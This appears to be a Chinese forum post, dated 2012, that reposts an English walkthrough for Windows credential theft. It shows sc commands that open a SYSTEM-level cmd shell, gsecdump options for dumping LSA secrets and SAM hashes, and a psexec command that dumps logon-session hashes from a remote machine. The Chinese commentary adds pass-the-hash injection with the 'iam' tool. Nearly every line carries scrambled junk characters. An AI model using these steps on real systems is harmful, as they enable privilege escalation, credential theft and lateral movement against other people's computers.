o get a DOS Prompt as NT system:
, u( {5 X, M: s0 l* U
; m7 g j: [9 zC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
/ B9 ~3 v) b6 X1 c[SC] CreateService SUCCESS1 q) Y! }( G C( M
' D( K: h* @& j$ z3 N$ I+ aC:\>sc start shellcmdline
' R' K B( G: w3 V& x[SC] StartService FAILED 1053:7 ~/ ~- X* h; W& {8 A1 k7 @/ G
% v$ x) S' `$ L P5 m3 i
The service did not respond to the start or control request in a timely fashion.9 T( H, `% K7 @) f
4 v4 [, B8 R$ b- tC:\>sc delete shellcmdline
* N1 A2 h' e5 ^[SC] DeleteService SUCCESS
; |% G7 R/ i7 \ ^* J! F3 \, ?
_: D4 U2 G; q+ i' A1 c------------) t) x% T" p+ n! o2 {1 @. d0 q
5 I* K8 |' B1 ]5 @+ GThen in the new DOS window:: Z# L7 S1 `3 {$ B7 Y& |' ^
; E" Z6 Z8 ]( XMicrosoft Windows XP [Version 5.1.2600]
1 m/ X+ e9 J% u6 h8 D) i(C) Copyright 1985-2001 Microsoft Corp.
9 ?, v/ w8 ~# i# d9 @( l
0 w9 Y" R9 l1 T {$ [, I, E; QC:\WINDOWS\system32>whoami* q6 x7 S% l9 e" A0 r( ^. o6 {
NT AUTHORITY\SYSTEM3 `6 x# B q$ c( v
$ P. q R) p6 f/ x- n7 Z1 m
C:\WINDOWS\system32>gsecdump -h2 Y+ \$ w6 q6 L6 i S
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
/ O+ c3 ?( z. \: tusage: gsecdump [options]* q+ d" D' V* c7 S
6 J' K3 ^+ q9 z; K: @! koptions:1 G" N" ?7 Y* c/ Q" m- X- ~) G
-h [ --help ] show help
3 g" }; Q+ g$ o% B$ y6 _7 W$ H0 o1 B" A-a [ --dump_all ] dump all secrets
5 _7 w9 Q C: x' @5 Q-l [ --dump_lsa ] dump lsa secrets( \' W: q- ~4 B# A& i' D* ?
-w [ --dump_wireless ] dump microsoft wireless connections' e5 ~) S8 }6 B" f% W- w7 y. O$ t
-u [ --dump_usedhashes ] dump hashes from active logon sessions1 J) c# ~2 V3 k F F1 J [
-s [ --dump_hashes ] dump hashes from SAM/AD# G+ C' K/ R; P5 U {
; f" n9 U: c3 o K! s1 vAlthough I like to use:! y4 V7 T6 M: R( \' T
5 l1 K, r4 C k4 `, m; oPsExec v1.83 - Execute processes remotely
4 a! m7 {. v8 b6 U h2 aCopyright (C) 2001-2007 Mark Russinovich8 j6 A8 N) y9 V/ y
Sysinternals - 链接标记[url]www.sysinternals.com[/url]) r0 x. K/ ]9 R
; N6 N- V* z, y* }8 o" [3 X, [
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT. ]2 B* |) D1 c" w
) ?6 H( w2 j% @( m
to get the hashes from active logon sessions of a remote system.
8 ^9 r: w( S- o O7 A# f" H$ J. G+ U
8 R0 X- E* {8 `$ z$ p1 ~; W) y, k3 [These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.- G" m3 i: Z b0 m$ a$ ?
2 r( S0 }& v4 S' ~
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.0 B7 u4 V }4 D) G3 C( q
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]5 g. x0 W `4 K9 W9 y2 C
4 @* O) e( K$ m6 k& Z! Z9 a0 |
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。 ~6 y& m, a! _' c
|
发表于 2012-11-6 21:09:29
收藏
支持
反对